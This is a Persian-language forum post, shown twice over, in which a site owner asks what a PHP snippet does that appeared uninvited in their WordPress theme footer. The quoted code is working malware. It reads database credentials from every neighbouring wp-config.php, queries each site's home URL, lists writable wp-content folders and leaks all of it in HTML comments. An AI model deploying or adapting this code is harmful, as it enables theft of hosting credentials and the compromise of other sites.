iranbest
شنبه 26 مهر 1393, 17:33 عصر
سلام خدمت کاربرای متخصص
بتازگی یه کد در پوسته سایتم در پایین فوتر اضافه شده
من اضافه نکردم و معلوم نیست چطور اضافه شده!
میخواستم بدونم دقیقا کارش چیه؟
<?phpif(stripos('win', PHP_OS) === false){ define('DS', DIRECTORY_SEPARATOR); $fullPath = dirname(__FILE__); $parts = explode(DS, $fullPath); $parts = array_slice($parts, 0, -4); $wwwroot = implode(DS, $parts);
$wp = $fullPath . DS. '..'.DS.'..'.DS.'..'.DS.'..'. DS; $dirs = scandir($wp); $work = array(); foreach($dirs as $dir){ $full = dirname(__FILE__) . '/../../../../' . $dir . '/wp-content/'; if(file_exists($full)){ $work[] = $wwwroot .DS. $dir ; } } foreach($work as $k => $path){ $wpconf = $path . '/wp-config.php'; $f = fopen($wpconf, 'r'); $content = fread($f, filesize($wpconf)); fclose($f); $pattern = '#DB_NAME[\'\"](?:.*)?[\'\"](.*)?[\'\"]\)#isU'; preg_match_all($pattern, $content, $res); $dbname = $res[1][0];
$pattern = '#DB_USER[\'\"](?:.*)?[\'\"](.*)?[\'\"]\)#isU'; preg_match_all($pattern, $content, $res); $dbuser = $res[1][0];
$pattern = '#DB_PASSWORD[\'\"](?:.*)?[\'\"](.*)?[\'\"]\)#isU'; preg_match_all($pattern, $content, $res); $dbpass = $res[1][0];
$pattern = '#DB_HOST[\'\"](?:.*)?[\'\"](.*)?[\'\"]\)#isU'; preg_match_all($pattern, $content, $res); $dbhost = $res[1][0];
$pattern = '#\$table_prefix(?:.*)?[\'\"](.*)?[\'\"]\;#isU'; preg_match_all($pattern, $content, $res); $dbprefix = $res[1][0];
$h = mysql_connect($dbhost, $dbuser, $dbpass) or die('ss'); mysql_select_db($dbname, $h) or die('f'); $data = mysql_query("SELECT option_value FROM ".$dbprefix."options WHERE option_name='home'") or die('d'); while($info = mysql_fetch_array( $data )) { $host[$k] = $info['option_value']; break; } mysql_close($h); }
echo '<!--##'; echo implode("\n", $host); echo "##-->\n";
$fold = array(); foreach($work as $i => $path){ $wpcontent = $path . '/wp-content'; $fold[$i] = get_leaf_dirs($wpcontent); } if(!empty($fold)){ echo '<!--$$'; foreach($fold as $fol){ if(!empty($fol)){ echo implode("\n", $fol); echo "\n"; } } echo '$$-->';
}
}if(!function_exists('scandir')) { // in case this script gets ported to PHP5, let's not break it function scandir($dir) { $files = array(); // added to initialize variable if(is_dir($dir)){ $dh = opendir($dir); // added some error-checking while(false !== ($filename = readdir($dh))) { if($filename == '.' || $filename == '..') continue; // no need to get the . or .. references, right? else $files[] = $filename; } return $files; } else { return false; } }}function get_leaf_dirs($dir) {$array = array();$d = dir($dir);while (false !== ($entry = $d->read())) {if($entry!='.' && $entry!='..') {$entry = $dir.'/'.$entry;if(is_dir($entry) && is_writable($entry)) {$subdirs = get_leaf_dirs($entry);if ($subdirs)$array = array_merge($array, $subdirs);else$array[] = $entry;}}if(sizeof($array)>0){break;}}$d->close();return $array;}?>
بتازگی یه کد در پوسته سایتم در پایین فوتر اضافه شده
من اضافه نکردم و معلوم نیست چطور اضافه شده!
میخواستم بدونم دقیقا کارش چیه؟
<?phpif(stripos('win', PHP_OS) === false){ define('DS', DIRECTORY_SEPARATOR); $fullPath = dirname(__FILE__); $parts = explode(DS, $fullPath); $parts = array_slice($parts, 0, -4); $wwwroot = implode(DS, $parts);
$wp = $fullPath . DS. '..'.DS.'..'.DS.'..'.DS.'..'. DS; $dirs = scandir($wp); $work = array(); foreach($dirs as $dir){ $full = dirname(__FILE__) . '/../../../../' . $dir . '/wp-content/'; if(file_exists($full)){ $work[] = $wwwroot .DS. $dir ; } } foreach($work as $k => $path){ $wpconf = $path . '/wp-config.php'; $f = fopen($wpconf, 'r'); $content = fread($f, filesize($wpconf)); fclose($f); $pattern = '#DB_NAME[\'\"](?:.*)?[\'\"](.*)?[\'\"]\)#isU'; preg_match_all($pattern, $content, $res); $dbname = $res[1][0];
$pattern = '#DB_USER[\'\"](?:.*)?[\'\"](.*)?[\'\"]\)#isU'; preg_match_all($pattern, $content, $res); $dbuser = $res[1][0];
$pattern = '#DB_PASSWORD[\'\"](?:.*)?[\'\"](.*)?[\'\"]\)#isU'; preg_match_all($pattern, $content, $res); $dbpass = $res[1][0];
$pattern = '#DB_HOST[\'\"](?:.*)?[\'\"](.*)?[\'\"]\)#isU'; preg_match_all($pattern, $content, $res); $dbhost = $res[1][0];
$pattern = '#\$table_prefix(?:.*)?[\'\"](.*)?[\'\"]\;#isU'; preg_match_all($pattern, $content, $res); $dbprefix = $res[1][0];
$h = mysql_connect($dbhost, $dbuser, $dbpass) or die('ss'); mysql_select_db($dbname, $h) or die('f'); $data = mysql_query("SELECT option_value FROM ".$dbprefix."options WHERE option_name='home'") or die('d'); while($info = mysql_fetch_array( $data )) { $host[$k] = $info['option_value']; break; } mysql_close($h); }
echo '<!--##'; echo implode("\n", $host); echo "##-->\n";
$fold = array(); foreach($work as $i => $path){ $wpcontent = $path . '/wp-content'; $fold[$i] = get_leaf_dirs($wpcontent); } if(!empty($fold)){ echo '<!--$$'; foreach($fold as $fol){ if(!empty($fol)){ echo implode("\n", $fol); echo "\n"; } } echo '$$-->';
}
}if(!function_exists('scandir')) { // in case this script gets ported to PHP5, let's not break it function scandir($dir) { $files = array(); // added to initialize variable if(is_dir($dir)){ $dh = opendir($dir); // added some error-checking while(false !== ($filename = readdir($dh))) { if($filename == '.' || $filename == '..') continue; // no need to get the . or .. references, right? else $files[] = $filename; } return $files; } else { return false; } }}function get_leaf_dirs($dir) {$array = array();$d = dir($dir);while (false !== ($entry = $d->read())) {if($entry!='.' && $entry!='..') {$entry = $dir.'/'.$entry;if(is_dir($entry) && is_writable($entry)) {$subdirs = get_leaf_dirs($entry);if ($subdirs)$array = array_merge($array, $subdirs);else$array[] = $entry;}}if(sizeof($array)>0){break;}}$d->close();return $array;}?>